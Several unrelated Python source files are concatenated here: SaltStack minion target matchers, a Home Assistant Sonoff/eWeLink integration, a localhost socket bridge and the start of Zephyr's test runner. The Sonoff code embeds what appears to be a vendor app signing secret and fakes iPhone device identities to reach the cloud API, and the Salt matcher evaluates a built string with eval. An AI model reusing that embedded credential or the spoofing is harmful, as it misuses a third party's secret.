log.error('Attempting to match with unknown matcher: {0}'.format(
matcher
))
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if type(tgt) != str:
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delim=':'):
'''
Reads in the grains glob match
'''
log.debug('grains target: {0}'.format(tgt))
if delim not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt, delim=delim)
def grain_pcre_match(self, tgt, delim=':'):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: {0}'.format(tgt))
if delim not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt,
delim=delim, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def exsel_match(self, tgt):
'''
Runs a function and return the exit code
'''
if tgt not in self.functions:
return False
return self.functions[tgt]()
def pillar_match(self, tgt, delim=':'):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: {0}'.format(tgt))
if delim not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['pillar'], tgt, delim=delim)
def ipcidr_match(self, tgt):
'''
Matches based on ip address or CIDR notation
'''
num_parts = len(tgt.split('/'))
if num_parts > 2:
# Target is not valid CIDR
return False
elif num_parts == 2:
# Target is CIDR
return salt.utils.network.in_subnet(
tgt,
addrs=self.opts['grains'].get('ipv4', [])
)
else:
# Target is an IPv4 address
import socket
try:
socket.inet_aton(tgt)
except socket.error:
# Not a valid IPv4 address
return False
else:
return tgt in self.opts['grains'].get('ipv4', [])
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: {0}'.format(exc))
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
if not isinstance(tgt, string_types):
log.debug('Compound target received that is not a string')
return False
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'L': 'list',
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
tokens = tgt.split()
for match in tokens:
# Try to match tokens from the compound target, first by using
# the 'G, X, I, L, S, E' matcher types, then by hostname glob.
if '@' in match and match[1] == '@':
comps = match.split('@')
matcher = ref.get(comps[0])
if not matcher:
# If an unknown matcher is called at any time, fail out
return False
results.append(
str(
getattr(self, '{0}_match'.format(matcher))(
'@'.join(comps[1:])
)
)
)
elif match in opers:
# We didn't match a target, so append a boolean operator or
# subexpression
if results:
if match == 'not':
if results[-1] == 'and':
pass
elif results[-1] == 'or':
pass
else:
results.append('and')
results.append(match)
else:
# seq start with oper, fail
if match not in ['(', ')']:
return False
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(str(self.glob_match(match)))
results = ' '.join(results)
try:
return eval(results)
except Exception:
log.error('Invalid compound target: {0}'.format(tgt))
return False
return False
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
def __init__(self, opts, timeout=60, safe=True): # pylint: disable=W0231
'''
Pass in the options dict
'''
self._running = None
# Warn if ZMQ < 3.2
if HAS_ZMQ and (not(hasattr(zmq, 'zmq_version_info')) or
zmq.zmq_version_info() < (3, 2)):
# PyZMQ 2.1.9 does not have zmq_version_info
log.warning('You have a version of ZMQ less than ZMQ 3.2! There '
'are known connection keep-alive issues with ZMQ < '
'3.2 which may result in loss of contact with '
'minions. Please upgrade your ZMQ!')
# Late setup the of the opts grains, so we can log from the grains
# module
# print opts['proxymodule']
fq_proxyname = 'proxy.'+opts['proxy']['proxytype']
self.proxymodule = salt.loader.proxy(opts, fq_proxyname)
opts['proxyobject'] = self.proxymodule[opts['proxy']['proxytype']+'.Proxyconn'](opts['proxy'])
opts['id'] = opts['proxyobject'].id(opts)
opts.update(resolve_dns(opts))
self.opts = opts
self.authenticate(timeout, safe)
self.opts['pillar'] = salt.pillar.get_pillar(
opts,
opts['grains'],
opts['id'],
opts['environment'],
).compile_pillar()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.functions, self.returners = self._load_modules()
self.matcher = Matcher(self.opts, self.functions)
self.proc_dir = get_proc_dir(opts['cachedir'])
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
self.grains_cache = self.opts['grains']
# self._running = True
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
return super(ProxyMinion, self)._prep_mod_opts()
def _load_modules(self):
'''
Return the functions and the returners loaded up from the loader
module
'''
return super(ProxyMinion, self)._load_modules()
|
__init__.py
|
# The domain of your component. Should be equal to the name of your component.
import logging, time, hmac, hashlib, random, base64, json, socket, requests, re, threading, hashlib, string
import voluptuous as vol
import asyncio
from datetime import timedelta
from datetime import datetime
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.event import async_track_time_interval
from homeassistant.helpers import discovery
from homeassistant.helpers import config_validation as cv
from homeassistant.const import (
EVENT_HOMEASSISTANT_STOP, CONF_SCAN_INTERVAL,
CONF_EMAIL, CONF_PASSWORD, CONF_USERNAME,
HTTP_MOVED_PERMANENTLY, HTTP_BAD_REQUEST,
HTTP_UNAUTHORIZED, HTTP_NOT_FOUND)
CONF_API_REGION = 'api_region'
CONF_GRACE_PERIOD = 'grace_period'
CONF_DEBUG = 'debug'
CONF_ENTITY_PREFIX = 'entity_prefix'
DOMAIN = "sonoffewe"
REQUIREMENTS = ['uuid', 'websocket-client==0.54.0']
import websocket
_LOGGER = logging.getLogger(__name__)
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Exclusive(CONF_USERNAME, CONF_PASSWORD): cv.string,
vol.Exclusive(CONF_EMAIL, CONF_PASSWORD): cv.string,
vol.Required(CONF_PASSWORD): cv.string,
vol.Optional(CONF_API_REGION, default='eu'): cv.string,
vol.Optional(CONF_SCAN_INTERVAL, default=timedelta(seconds=30)): cv.time_period,
vol.Optional(CONF_GRACE_PERIOD, default=600): cv.positive_int,
vol.Optional(CONF_ENTITY_PREFIX, default=True): cv.boolean,
vol.Optional(CONF_DEBUG, default=False): cv.boolean
}, extra=vol.ALLOW_EXTRA),
}, extra=vol.ALLOW_EXTRA)
async def async_setup(hass, config):
"""Setup the eWelink/Sonoffewe component."""
_LOGGER.debug("Create the main object")
hass.data[DOMAIN] = Sonoffewe(hass, config)
if hass.data[DOMAIN].get_wshost(): # make sure login was successful
for component in ['switch','sensor']:
discovery.load_platform(hass, component, DOMAIN, {}, config)
hass.bus.async_listen('sonoffewe_state', hass.data[DOMAIN].state_listener)
# close the websocket when HA stops
# hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, hass.data[DOMAIN].get_ws().close())
def update_devices(event_time):
asyncio.run_coroutine_threadsafe( hass.data[DOMAIN].async_update(), hass.loop)
async_track_time_interval(hass, update_devices, hass.data[DOMAIN].get_scan_interval())
return True
class Sonoffewe():
def __init__(self, hass, config):
self._hass = hass
# get config details from from configuration.yaml
self._email = config.get(DOMAIN, {}).get(CONF_EMAIL,'')
self._username = config.get(DOMAIN, {}).get(CONF_USERNAME,'')
self._password = config.get(DOMAIN, {}).get(CONF_PASSWORD,'')
self._api_region = config.get(DOMAIN, {}).get(CONF_API_REGION,'')
self._entity_prefix = config.get(DOMAIN, {}).get(CONF_ENTITY_PREFIX,'')
self._scan_interval = config.get(DOMAIN, {}).get(CONF_SCAN_INTERVAL)
self._sonoffewe_debug = config.get(DOMAIN, {}).get(CONF_DEBUG, False)
self._sonoffewe_debug_log = []
if self._email and not self._username: # backwards compatibility
self._username = self._email.strip()
self._skipped_login = 0
self._grace_period = timedelta(seconds=config.get(DOMAIN, {}).get(CONF_GRACE_PERIOD,''))
self._devices = []
self._user_apikey = None
self._ws = None
self._wshost = None
self.write_debug('{}', new=True)
self.do_login()
def get_scan_interval(self):
if DOMAIN in self._hass.data and self._hass.data[DOMAIN].get_debug_state():
self._scan_interval = timedelta(seconds=10)
elif self._scan_interval < timedelta(seconds=60):
self._scan_interval = timedelta(seconds=60)
return self._scan_interval
def get_debug_state(self):
return self._sonoffewe_debug
def get_entity_prefix(self):
# if the entities should have `sonoffewe_` prefixed or not
# a quick fix between (i-blame-myself) `master` vs. `websocket` implementations
return self._entity_prefix
def do_login(self):
import uuid
# reset the grace period
self._skipped_login = 0
self._model = 'iPhone' + random.choice(['6,1', '6,2', '7,1', '7,2', '8,1', '8,2', '8,4', '9,1', '9,2', '9,3', '9,4', '10,1', '10,2', '10,3', '10,4', '10,5', '10,6', '11,2', '11,4', '11,6', '11,8'])
self._romVersion = random.choice([
'10.0', '10.0.2', '10.0.3', '10.1', '10.1.1', '10.2', '10.2.1', '10.3', '10.3.1', '10.3.2', '10.3.3', '10.3.4',
'11.0', '11.0.1', '11.0.2', '11.0.3', '11.1', '11.1.1', '11.1.2', '11.2', '11.2.1', '11.2.2', '11.2.3', '11.2.4', '11.2.5', '11.2.6', '11.3', '11.3.1', '11.4', '11.4.1',
'12.0', '12.0.1', '12.1', '12.1.1', '12.1.2', '12.1.3', '12.1.4', '12.2', '12.3', '12.3.1', '12.3.2', '12.4', '12.4.1', '12.4.2',
'13.0', '13.1', '13.1.1', '13.1.2', '13.2'
])
self._appVersion = random.choice(['3.5.3', '3.5.4', '3.5.6', '3.5.8', '3.5.10', '3.5.12', '3.6.0', '3.6.1', '3.7.0', '3.8.0', '3.9.0', '3.9.1', '3.10.0', '3.11.0'])
self._imei = str(uuid.uuid4())
_LOGGER.debug(json.dumps({
'model' : self._model,
'romVersion' : self._romVersion,
'appVersion' : self._appVersion,
'imei' : self._imei
}))
app_details = {
'password' : self._password,
'version' : '6',
'ts' : int(time.time()),
'nonce' : ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(8)),
'appid' : 'oeVkj2lYFGnJu5XUtWisfW4utiN4u9Mq',
'imei' : self._imei,
'os' : 'iOS',
'model' : self._model,
'romVersion': self._romVersion,
'appVersion': self._appVersion
}
if re.match(r'[^@]+@[^@]+\.[^@]+', self._username):
app_details['email'] = self._username
else:
app_details['phoneNumber'] = self._username
decryptedAppSecret = b'6Nz4n0xA8s8qdxQf2GqurZj2Fs55FUvM'
hex_dig = hmac.new(
decryptedAppSecret,
str.encode(json.dumps(app_details)),
digestmod=hashlib.sha256).digest()
sign = base64.b64encode(hex_dig).decode()
self._headers = {
'Authorization' : 'Sign ' + sign,
'Content-Type' : 'application/json;charset=UTF-8'
}
r = requests.post('https://{}-api.coolkit.cc:8080/api/user/login'.format(self._api_region),
headers=self._headers, json=app_details)
resp = r.json()
# get a new region to login
if 'error' in resp and 'region' in resp and resp['error'] == HTTP_MOVED_PERMANENTLY:
self._api_region = resp['region']
self._wshost = None
_LOGGER.warning("found new region: >>> %s <<< (you should change api_region option to this value in configuration.yaml)", self._api_region)
# re-login using the new localized endpoint
self.do_login()
elif 'error' in resp and resp['error'] in [HTTP_NOT_FOUND, HTTP_BAD_REQUEST]:
# (most likely) login with +86... phone number and region != cn
if '@' not in self._username and self._api_region in ['eu', 'us']:
# self._api_region = 'cn'
# self.do_login()
_LOGGER.error('Login failed! try to change the api_region to \'cn\' OR \'as\'')
else:
_LOGGER.error("Couldn't authenticate using the provided credentials!")
else:
if 'at' not in resp:
_LOGGER.error('Login failed! Please check credentials!')
return
self._bearer_token = resp['at']
self._user_apikey = resp['user']['apikey']
self._headers.update({'Authorization' : 'Bearer ' + self._bearer_token})
self.update_devices() # to write the devices list
# get/find the websocket host
if not self._wshost:
self.set_wshost()
if self.get_wshost() is not None:
self.thread = threading.Thread(target=self.init_websocket)
self.thread.daemon = True
self.thread.start()
def set_wshost(self):
r = requests.post('https://%s-disp.coolkit.cc:8080/dispatch/app' % self._api_region, headers=self._headers)
resp = r.json()
if 'error' in resp and resp['error'] == 0 and 'domain' in resp:
self._wshost = resp['domain']
_LOGGER.info("Found websocket address: %s", self._wshost)
else:
_LOGGER.error("Couldn't find a valid websocket host, abording Sonoffewe init")
async def state_listener(self, event):
if not self.get_ws().connected:
_LOGGER.error('websocket is not connected')
return
_LOGGER.debug('received state event change from: %s' % event.data['deviceid'])
new_state = event.data['state']
# convert from True/False to on/off
if isinstance(new_state, (bool)):
new_state = 'on' if new_state else 'off'
device = self.get_device(event.data['deviceid'])
outlet = event.data['outlet']
if outlet is not None:
_LOGGER.debug("Switching `%s - %s` on outlet %d to state: %s", \
device['deviceid'], device['name'] , (outlet+1) , new_state)
else:
_LOGGER.debug("Switching `%s` to state: %s", device['deviceid'], new_state)
if not device:
_LOGGER.error('unknown device to be updated')
return False
"""
the payload rule is like this:
normal device (non-shared)
apikey = login apikey (= device apikey too)
shared device
apikey = device apikey
selfApiKey = login apikey (yes, it's typed corectly selfApikey and not selfApiKey :|)
"""
if outlet is not None:
params = { 'switches' : device['params']['switches'] }
params['switches'][outlet]['switch'] = new_state
else:
params = { 'switch' : new_state }
payload = {
'action' : 'update',
'userAgent' : 'app',
'params' : params,
'apikey' : device['apikey'],
'deviceid' : str(device['deviceid']),
'sequence' : str(time.time()).replace('.',''),
'controlType' : device['params']['controlType'] if 'controlType' in device['params'] else 4,
'ts' : 0
}
# this key is needed for a shared device
if device['apikey'] != self.get_user_apikey():
payload['selfApikey'] = self.get_user_apikey()
self.get_ws().send(json.dumps(payload))
# set also te pseudo-internal state of the device until the real refresh kicks in
for idxd, dev in enumerate(self._devices):
if dev['deviceid'] == device['deviceid']:
if outlet is not None:
self._devices[idxd]['params']['switches'][outlet]['switch'] = new_state
else:
self._devices[idxd]['params']['switch'] = new_state
data = json.dumps({'entity_id' : str(device['deviceid']), 'outlet': outlet, 'new_state' : new_state})
self.write_debug(data, type='S')
def init_websocket(self):
# keep websocket open indefinitely
while True:
_LOGGER.debug('(re)init websocket')
self._ws = WebsocketListener(sonoffewe=self, on_message=self.on_message, on_error=self.on_error)
try:
# 145 interval is defined by the first websocket response after login
self._ws.run_forever(ping_interval=145)
finally:
self._ws.close()
def on_message(self, *args):
data = args[-1] # to accomodate the weird behaviour where the function receives 2 or 3 args
_LOGGER.debug('websocket msg: %s', data)
data = json.loads(data)
if 'action' in data and data['action'] == 'update' and 'params' in data:
if 'switch' in data['params'] or 'switches' in data['params']:
for idx, device in enumerate(self._devices):
if device['deviceid'] == data['deviceid']:
self._devices[idx]['params'] = data['params']
if 'switches' in data['params']:
for switch in data['params']['switches']:
self.set_entity_state(data['deviceid'], switch['switch'], switch['outlet'])
else:
self.set_entity_state(data['deviceid'], data['params']['switch'])
break # do not remove
self.write_debug(json.dumps(data), type='W')
def on_error(self, *args):
error = args[-1] # to accomodate the case when the function receives 2 or 3 args
_LOGGER.error('websocket error: %s' % str(error))
def is_grace_period(self):
grace_time_elapsed = self._skipped_login * int(self.get_scan_interval().total_seconds())
grace_status = grace_time_elapsed < int(self._grace_period.total_seconds())
if grace_status:
self._skipped_login += 1
return grace_status
def set_entity_state(self, deviceid, state, outlet=None):
entity_id = 'switch.%s%s%s' % (
'sonoffewe_' if self._entity_prefix else '',
deviceid,
'_'+str(outlet+1) if outlet is not None else ''
)
# possible @PATCH when (i assume) the device is reported offline in HA but an update comes from websocket
if hasattr(self._hass.states.get(entity_id), 'attributes'):
attr = self._hass.states.get(entity_id).attributes
self._hass.states.set(entity_id, state, attr)
data = json.dumps({'entity_id' : entity_id, 'outlet': outlet, 'state' : state})
self.write_debug(data, type='s')
def update_devices(self):
if self.get_user_apikey() is None:
_LOGGER.error("Initial login failed, devices cannot be updated!")
return self._devices
# we are in the grace period, no updates to the devices
if self._skipped_login and self.is_grace_period():
_LOGGER.info("Grace period active")
return self._devices
r = requests.get('https://{}-api.coolkit.cc:8080/api/user/device?lang=en&apiKey={}&getTags=1&version=6&ts=%s&nonce=%s&appid=oeVkj2lYFGnJu5XUtWisfW4utiN4u9Mq&imei=%s&os=iOS&model=%s&romVersion=%s&appVersion=%s'.format(
self._api_region, self.get_user_apikey(), str(int(time.time())), ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(8)), self._imei, self._model, self._romVersion, self._appVersion
), headers=self._headers)
# _LOGGER.error(r.text)
resp = r.json()
if 'error' in resp and resp['error'] in [HTTP_BAD_REQUEST, HTTP_UNAUTHORIZED]:
# @IMPROVE add maybe a service call / switch to deactivate sonoffewe component
if self.is_grace_period():
_LOGGER.warning("Grace period activated!")
# return the current (and possible old) state of devices
# in this period any change made with the mobile app (on/off) won't be shown in HA
return self._devices
_LOGGER.info("Re-login component")
self.do_login()
self._devices = r.json()['devicelist'] if 'devicelist' in r.json() else r.json()
self.write_debug(r.text, type='D')
return self._devices
def get_devices(self, force_update = False):
if force_update:
return self.update_devices()
return self._devices
def get_device(self, deviceid):
for device in self.get_devices():
if 'deviceid' in device and device['deviceid'] == deviceid:
return device
def get_bearer_token(self):
return self._bearer_token
def get_user_apikey(self):
return self._user_apikey
def get_ws(self):
return self._ws
def get_wshost(self):
return self._wshost
def get_model(self):
return self._model
def get_romVersion(self):
return self._romVersion
async def async_update(self):
devices = self.update_devices()
def get_outlets(self, device):
# information found in ewelink app source code
name_to_outlets = {
'SOCKET' : 1,
'SWITCH_CHANGE' : 1,
'GSM_UNLIMIT_SOCKET' : 1,
'SWITCH' : 1,
'THERMOSTAT' : 1,
'SOCKET_POWER' : 1,
'GSM_SOCKET' : 1,
'POWER_DETECTION_SOCKET': 1,
'SOCKET_2' : 2,
'GSM_SOCKET_2' : 2,
'SWITCH_2' : 2,
'SOCKET_3' : 3,
'GSM_SOCKET_3' : 3,
'SWITCH_3' : 3,
'SOCKET_4' : 4,
'GSM_SOCKET_4' : 4,
'SWITCH_4' : 4,
'CUN_YOU_DOOR' : 4
}
uiid_to_name = {
1 : "SOCKET",
2 : "SOCKET_2",
3 : "SOCKET_3",
4 : "SOCKET_4",
5 : "SOCKET_POWER",
6 : "SWITCH",
7 : "SWITCH_2",
8 : "SWITCH_3",
9 : "SWITCH_4",
10 : "OSPF",
11 : "CURTAIN",
12 : "EW-RE",
13 : "FIREPLACE",
14 : "SWITCH_CHANGE",
15 : "THERMOSTAT",
16 : "COLD_WARM_LED",
17 : "THREE_GEAR_FAN",
18 : "SENSORS_CENTER",
19 : "HUMIDIFIER",
22 : "RGB_BALL_LIGHT",
23 : "NEST_THERMOSTAT",
24 : "GSM_SOCKET",
25 : 'AROMATHERAPY',
26 : "RuiMiTeWenKongQi",
27 : "GSM_UNLIMIT_SOCKET",
28 : "RF_BRIDGE",
29 : "GSM_SOCKET_2",
30 : "GSM_SOCKET_3",
31 : "GSM_SOCKET_4",
32 : "POWER_DETECTION_SOCKET",
33 : "LIGHT_BELT",
34 : "FAN_LIGHT",
35 : "EZVIZ_CAMERA",
36 : "SINGLE_CHANNEL_DIMMER_SWITCH",
38 : "HOME_KIT_BRIDGE",
40 : "FUJIN_OPS",
41 : "CUN_YOU_DOOR",
42 : "SMART_BEDSIDE_AND_NEW_RGB_BALL_LIGHT",
43 : "",
44 : "",
45 : "DOWN_CEILING_LIGHT",
46 : "AIR_CLEANER",
49 : "MACHINE_BED",
51 : "COLD_WARM_DESK_LIGHT",
52 : "DOUBLE_COLOR_DEMO_LIGHT",
53 : "ELECTRIC_FAN_WITH_LAMP",
55 : "SWEEPING_ROBOT",
56 : "RGB_BALL_LIGHT_4",
57 : "MONOCHROMATIC_BALL_LIGHT",
59 : "MUSIC_LIGHT_BELT",
60 : "NEW_HUMIDIFIER",
61 : "KAI_WEI_ROUTER",
62 : "MEARICAMERA",
66 : "ZIGBEE_MAIN_DEVICE",
67 : "RollingDoor",
68 : "KOOCHUWAH",
1001 : "BLADELESS_FAN",
1003 : "WARM_AIR_BLOWER",
1000 : "ZIGBEE_SINGLE_SWITCH",
1770 : "ZIGBEE_TEMPERATURE_SENSOR",
1256 : "ZIGBEE_LIGHT"
}
if device['uiid'] in uiid_to_name.keys() and \
uiid_to_name[device['uiid']] in name_to_outlets.keys():
return name_to_outlets[uiid_to_name[device['uiid']]]
return None
### sonog_debug.log section ###
def write_debug(self, data, type = '', new = False):
if self._sonoffewe_debug and self._hass.states.get('switch.sonoffewe_debug') and self._hass.states.is_state('switch.sonoffewe_debug','on'):
if not len(self._sonoffewe_debug_log):
_LOGGER.debug("init sonoffewe debug data capture")
self._sonoffewe_debug_log.append(".\n--------------COPY-FROM-HERE--------------\n\n")
data = json.loads(data)
# remove extra info
if isinstance(data, list):
for idx, d in enumerate(data):
for k in ['extra', 'sharedTo','settings','group','groups','deviceUrl','deviceStatus',
'location','showBrand','brandLogoUrl','__v','_id','ip',
'deviceid','createdAt','devicekey','apikey','partnerApikey','tags']:
if k in d.keys(): del d[k]
for k in ['staMac','bindInfos','rssi','timers','partnerApikey']:
if k in d['params'].keys(): del d['params'][k]
# hide deviceid
if 'deviceid' in d.keys():
m = hashlib.md5()
m.update(d['deviceid'].encode('utf-8'))
d['deviceid'] = m.hexdigest()
data[idx] = d
data = json.dumps(data, indent=2, sort_keys=True)
data = self.clean_data(data)
data = json.dumps(json.loads(data))
data = "%s [%s] %s\n\n" % (datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[:-3], type, data)
self._sonoffewe_debug_log.append(data)
elif self._sonoffewe_debug and len(self._sonoffewe_debug_log) and \
self._hass.states.get('switch.sonoffewe_debug') and \
self._hass.states.is_state('switch.sonoffewe_debug','off'):
_LOGGER.debug("end of sonoffewe debug log")
self._sonoffewe_debug_log.append("---------------END-OF-COPY----------------\n")
self._sonoffewe_debug_log = [x.encode('utf-8') for x in self._sonoffewe_debug_log]
self._hass.components.persistent_notification.async_create(str(b"".join(self._sonoffewe_debug_log), 'utf-8'), 'Sonoffewe debug')
self._sonoffewe_debug_log = []
def clean_data(self, data):
data = re.sub(r'"phoneNumber": ".*"', '"phoneNumber": "[hidden]",', data)
# data = re.sub(r'"name": ".*"', '"name": "[hidden]",', data)
data = re.sub(r'"ip": ".*",', '"ip": "[hidden]",', data)
#data = re.sub(r'"deviceid": ".*",', '"deviceid": "[hidden]",', data)
# data = re.sub(r'"_id": ".*",', '"_id": "[hidden]",', data)
data = re.sub(r'"\w{2}:\w{2}:\w{2}:\w{2}:\w{2}:\w{2}"', '"xx:xx:xx:xx:xx:xx"', data)
data = re.sub(r'"\w{8}-\w{4}-\w{4}-\w{4}-\w{12}"', '"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"', data)
# data = re.sub(r'"\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\.\d+Z"', '"xxxx-xx-xxxxx:xx:xx.xxx"', data)
return data
class WebsocketListener(threading.Thread, websocket.WebSocketApp):
def __init__(self, sonoffewe, on_message=None, on_error=None):
self._sonoffewe = sonoffewe
threading.Thread.__init__(self)
websocket.WebSocketApp.__init__(self, 'wss://{}:8080/api/ws'.format(self._sonoffewe.get_wshost()),
on_open=self.on_open,
on_error=on_error,
on_message=on_message,
on_close=self.on_close)
self.connected = False
self.last_update = time.time()
def on_open(self, *args):
self.connected = True
self.last_update = time.time()
payload = {
'action' : "userOnline",
'userAgent' : 'app',
'version' : 6,
'nonce' : ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(8)),
'apkVersion': "1.8",
'os' : 'iOS',
'at' : self._sonoffewe.get_bearer_token(),
'apikey' : self._sonoffewe.get_user_apikey(),
'ts' : str(int(time.time())),
'model' : self._sonoffewe.get_model(),
'romVersion': self._sonoffewe.get_romVersion(),
'sequence' : str(time.time()).replace('.','')
}
self.send(json.dumps(payload))
def on_close(self, *args):
_LOGGER.debug('websocket closed')
self.connected = False
def run_forever(self, sockopt=None, sslopt=None, ping_interval=0, ping_timeout=None):
websocket.WebSocketApp.run_forever( self,
sockopt=sockopt,
sslopt=sslopt,
ping_interval=ping_interval,
ping_timeout=ping_timeout)
class SonoffeweDevice(Entity):
"""Representation of a Sonoffewe device"""
def __init__(self, hass, device):
"""Initialize the device."""
self._outlet = None
self._sensor = None
self._state = None
self._hass = hass
self._deviceid = device['deviceid']
self._available = device['online']
self._attributes = {
'device_id' : self._deviceid,
}
def get_device(self):
for device in self._hass.data[DOMAIN].get_devices():
if 'deviceid' in device and device['deviceid'] == self._deviceid:
return device
return None
def get_state(self):
device = self.get_device()
# Pow & Pow R2:
if 'power' in device['params']:
self._attributes['power'] = device['params']['power']
# Pow R2 only:
if 'current' in device['params']:
self._attributes['current'] = device['params']['current']
if 'voltage' in device['params']:
self._attributes['voltage'] = device['params']['voltage']
if 'dusty' in device['params']:
self._attributes['dusty'] = device['params']['dusty']
if 'light' in device['params']:
self._attributes['light'] = device['params']['light']
if 'noise' in device['params']:
self._attributes['noise'] = device['params']['noise']
# TH10/TH16
if 'currentHumidity' in device['params'] and device['params']['currentHumidity'] != "unavailable":
self._attributes['humidity'] = device['params']['currentHumidity']
if 'currentTemperature' in device['params'] and device['params']['currentTemperature'] != "unavailable":
self._attributes['temperature'] = device['params']['currentTemperature']
if 'humidity' in device['params'] and device['params']['humidity'] != "unavailable":
self._attributes['humidity'] = device['params']['humidity']
if 'temperature' in device['params'] and device['params']['temperature'] != "unavailable":
self._attributes['temperature'] = device['params']['temperature']
if 'rssi' in device['params']:
self._attributes['rssi'] = device['params']['rssi']
# the device has more switches
if self._outlet is not None:
return device['params']['switches'][self._outlet]['switch'] == 'on' if device else False
else:
return device['params']['switch'] == 'on' if device else False
def get_available(self):
device = self.get_device()
return device['online'] if device else False
@property
def should_poll(self):
"""Return the polling state."""
return True
@property
def name(self):
"""Return the name of the switch."""
return self._name
@property
def available(self):
"""Return true if device is online."""
return self.get_available()
# @Throttle(MIN_TIME_BETWEEN_UPDATES)
def update(self):
"""Update device state."""
# we don't update here because there's 1 single thread that can be active at anytime
# and the websocket will send the state update messages
pass
@property
def device_state_attributes(self):
"""Return device specific state attributes."""
return self._attributes
|
local_bridge.py
|
from socket import socket, AF_INET, SOCK_STREAM
from threading import Thread
import json
import asyncio
ip = '127.0.0.1'
port = 5001
#class ServerThread(Thread):
# def __init__(self, q_main, q_worker):
# self.queue_main = q_main
# self.queue_worker = q_worker
# super().__init__()
# def run(self):
# while True:
# sleep(1)
# self.queue_main.put('run help')
# item = self.queue_worker.get() # waits for item from main thread
# print('Received ', item)
#def sock_connect():
# try:
# print('Thread start')
# sock = socket(AF_INET, SOCK_STREAM)
# sock.connect(('127.0.0.1', 5001))
# except KeyboardInterrupt:
# sock.close()
#
#thread = Thread(target = sock_connect)
#thread.start()
def set_addr(ip_, port_):
global ip, port
ip=ip_
port =port_
def send_to_bot(data: dict):
json_data = json.dumps(data)
sock = socket(AF_INET, SOCK_STREAM)
resp = None
try:
sock.connect(('127.0.0.1', 5001))
sock.send(json_data.encode())
resp = json.loads(sock.recv(4096))
except Exception as e:
print(e)
finally:
try:
sock.close()
except:
pass
finally:
return resp
|
twisterlib.py
|
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import threading
import concurrent.futures
from collections import OrderedDict
import queue
import time
import csv
import glob
import concurrent
import xml.etree.ElementTree as ET
import logging
from pathlib import Path
from distutils.spawn import find_executable
from colorama import Fore
import pickle
import platform
import yaml
import json
from multiprocessing import Lock, Process, Value
from typing import List
try:
# Use the C LibYAML parser if available, rather than the Python parser.
# It's much faster.
from yaml import CSafeLoader as SafeLoader
from yaml import CDumper as Dumper
except ImportError:
from yaml import SafeLoader, Dumper
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
try:
import pty
except ImportError as capture_error:
if os.name == "nt": # "nt" means that program is running on Windows OS
pass # "--device-serial-pty" option is not supported on Windows OS
else:
raise capture_error
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
# This is needed to load edt.pickle files.
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts",
"python-devicetree", "src"))
from devicetree import edtlib # pylint: disable=unused-import
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
import scl
